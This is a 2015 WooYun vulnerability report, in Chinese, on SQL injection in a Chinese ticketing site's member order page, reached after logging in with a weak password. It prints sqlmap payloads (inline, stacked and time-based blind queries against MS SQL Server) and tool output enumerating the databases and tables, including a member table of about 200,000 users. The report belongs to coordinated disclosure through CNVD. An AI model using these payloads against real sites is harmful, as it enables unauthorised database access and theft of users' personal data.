当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156207

漏洞标题:中国票务中心用户登录后多个参数存在SQL注入(可获取20万用户信息+大量记录信息)

相关厂商:中国票务中心

漏洞作者: 路人甲

提交时间:2015-11-27 14:38

修复时间:2016-01-15 18:52

公开时间:2016-01-15 18:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

利用用户弱口令登录后,发现有多个参数存在注入。

详细说明:

http://**.**.**.**/bugs/wooyun-2015-0152363/trace/3bf1826591c4373d8851ac9f18096a03
这个提交半个多月了,还没有审核过,估计不会审核了吧!~~~
提交完下面这个就不提交了!~~~
前几天测试的!~~~
注入点:
http://**.**.**.**/Member/OrderList.aspx?OrderType=TICKET&OrderId=106775 (GET)
OrderType和OrderId均存在注入

[02:34:44] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: OrderId
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: OrderType=TICKET&OrderId=(SELECT CHAR(113)+CHAR(97)+CHAR(99)+CHAR(1
16)+CHAR(113)+(SELECT (CASE WHEN (3667=3667) THEN CHAR(49) ELSE CHAR(48) END))+C
HAR(113)+CHAR(122)+CHAR(115)+CHAR(110)+CHAR(113))
Place: GET
Parameter: OrderType
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: OrderType=TICKET; WAITFOR DELAY '0:0:5'--&OrderId=106775
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: OrderType=TICKET WAITFOR DELAY '0:0:5'--&OrderId=106775
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: OrderType, type: Unescaped numeric (default)
[1] place: GET, parameter: OrderId, type: Unescaped numeric
[q] Quit
> 1
[02:34:46] [INFO] testing Microsoft SQL Server
[02:34:46] [INFO] confirming Microsoft SQL Server
[02:34:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[02:34:55] [INFO] fetching current user
[02:34:56] [INFO] retrieved: web61247
current user:    'web61247'
[02:34:56] [INFO] fetching current database
[02:34:56] [INFO] retrieved: www_51piao_com
current database:    'www_51piao_com'
[02:34:56] [INFO] testing if current user is DBA
current user is DBA:    False
[02:35:27] [INFO] fetching database names
[02:35:27] [INFO] the SQL query used returns 7 entries
[02:35:27] [INFO] starting 7 threads
[02:35:27] [INFO] retrieved: www_51piao_com
[02:35:28] [INFO] retrieved: tempdb
[02:35:28] [INFO] retrieved: msdb
[02:35:29] [INFO] retrieved: pubs
[02:35:29] [INFO] retrieved: master
[02:35:30] [INFO] retrieved: model
[02:35:30] [INFO] retrieved: Northwind
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www_51piao_com
Database: www_51piao_com
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.OrderLog            | 960732  |
| dbo.TicketPrice         | 370811  |
| dbo.vMemberAll          | 341377  |
| dbo.vTicketPrice        | 248395  |
| dbo.MemberAddrBook      | 205932  |
| dbo.Member              | 198781  |
| dbo.vMember             | 198781  |
| dbo.OrderMain           | 179399  |
| dbo.OprLog              | 178079  |
| dbo.vEmailAll           | 130017  |
| dbo.MemberPointLog      | 126495  |
| dbo.TicketOrderDetail   | 124584  |
| dbo.vTicketOrderStat    | 124584  |
| dbo.vFlightTicketOrder  | 121554  |
| dbo.SmsLog              | 110928  |
| dbo.TicketOrder         | 106032  |
| dbo.vTicketOrder        | 106032  |
| dbo.vMobileTemp         | 98103   |
| dbo.vMoibleAll          | 98103   |
| dbo.vMobileAllOrder     | 98093   |
| dbo.vMemberTemp         | 93106   |
| dbo.MemberMoneyLog      | 81842   |
| dbo.TicketPlay          | 81607   |
| dbo.VTicketPlayMag      | 81561   |
| dbo.FlightLog           | 72996   |
| dbo.TrainNew            | 70195   |
| dbo.vLoginLog           | 58668   |
| dbo.ImagesTicket        | 37727   |
| dbo.monitor             | 36593   |
| dbo.FlightOrderDetail   | 31300   |
| dbo.vFlightOrderDetail  | 21042   |
| dbo.FlightOrder         | 15522   |
| dbo.vFlightOrder        | 15522   |
| dbo.Ticket              | 14242   |
| dbo.vTicket             | 14126   |
| dbo.vTicketDetail       | 14126   |
| dbo.vTicketMag          | 14126   |
| dbo.OrderPayCard        | 13596   |
| dbo.vOrderPayCard       | 13596   |
| dbo.MemberLog           | 11974   |
| dbo.vFlightTicketSend   | 10297   |
| dbo.AccountAll          | 8339    |
| dbo.TicketPreOrder      | 6295    |
| dbo.vTicketAddrUse      | 5225    |
| dbo.TicketReview        | 3663    |
| dbo.vTicketReviewList   | 3057    |
| dbo.FlightLogStat       | 2757    |
| dbo.FlightKM            | 1398    |
| dbo.o_kehu              | 1317    |
| dbo.ImagesCommon        | 860     |
| dbo.WebTop              | 858     |
| dbo.JOYCOMPANY          | 786     |
| dbo.vJoyCompany         | 786     |
| dbo.VJoyCompanyMag      | 786     |
| dbo.LinkInfo            | 780     |
| dbo.CITY                | 647     |
| dbo.AgentInfo           | 526     |
| dbo.VChinaCity          | 455     |
| dbo.NewsHelp            | 431     |
| dbo.vNewsHelp           | 416     |
| dbo.VNewsHelp1          | 416     |
| dbo.PointProductOrder   | 293     |
| dbo.vTicketBig          | 280     |
| dbo.vTicketHomeTop      | 279     |
| dbo.MemberWebUnion      | 210     |
| dbo.vTicketLeft         | 176     |
| dbo.vTicketSmall        | 155     |
| dbo.FlightCityCode      | 152     |
| dbo.FlightSale          | 144     |
| dbo.VFlightSale         | 141     |
| dbo.Area                | 131     |
| dbo.Users               | 116     |
| dbo.vUserMag            | 116     |
| dbo.BlackIp             | 103     |
| dbo.REGION              | 96      |
| dbo.PointProduct        | 84      |
| dbo.TrainTrade          | 65      |
| dbo.vTrainTrade         | 65      |
| dbo.TrainTradeBak       | 60      |
| dbo.NewsHelpModule      | 57      |
| dbo.sysconstraints      | 54      |
| dbo.vPointProduct       | 44      |
| dbo.vPointProduct1      | 44      |
| dbo.TravelLine          | 35      |
| dbo.vTravelLine         | 35      |
| dbo.VTravelLine1        | 35      |
| dbo.vTravelLineDetail   | 35      |
| dbo.Province            | 34      |
| dbo.vMobileAllTrain     | 26      |
| dbo.vTicketTypeCount    | 22      |
| dbo.TempSql             | 17      |
| dbo.vJoyCompanyTop      | 17      |
| dbo.TicketType          | 14      |
| dbo.vTicketType         | 14      |
| dbo.OrderPayMethod      | 12      |
| dbo.FlightSpec          | 11      |
| dbo.vFlightSpec         | 11      |
| web61247.D99_Tmp        | 11      |
| dbo.MemberGroup         | 10      |
| dbo.SmsTemplate         | 10      |
| dbo.vSmsTemplate        | 10      |
| dbo.vTemp               | 10      |
| dbo.BaseCreditCard      | 9       |
| dbo.WebModule           | 9       |
| dbo.vWebCity            | 8       |
| dbo.WebCity             | 8       |
| dbo.BlackList           | 7       |
| dbo.SmsEvent            | 7       |
| dbo.BbsBanner           | 6       |
| dbo.Groups              | 6       |
| dbo.OrderFlightTakeAddr | 6       |
| dbo.PointProductType    | 5       |
| dbo.vHomeTicket         | 5       |
| dbo.vSmsModule          | 5       |
| dbo.HotelOrder          | 4       |
| dbo.vHotelOrder         | 4       |
| dbo.syssegments         | 3       |
| dbo.BaseYesNo           | 2       |
| dbo.FlightTicketAddr    | 2       |
| dbo.PriceType           | 2       |
| dbo.CompanySeq          | 1       |
| dbo.FlightSaleTop       | 1       |
| dbo.OrderSeq            | 1       |
| dbo.TravelCompany       | 1       |
+-------------------------+---------+
| dbo.Member              | 198781  |
| dbo.vMember             | 198781  |
| dbo.Users               | 116     |
| dbo.vUserMag            | 116     |


51piao-1.jpg


51piao-2.jpg


51piao-3.jpg


近20万用户!~~~
太多了,又慢,就不dump了!~~~

漏洞证明:

登录后的注入点剩下的自己排查吧!~~~不测试了!~~~

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-01 18:51

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无

漏洞评价:

评价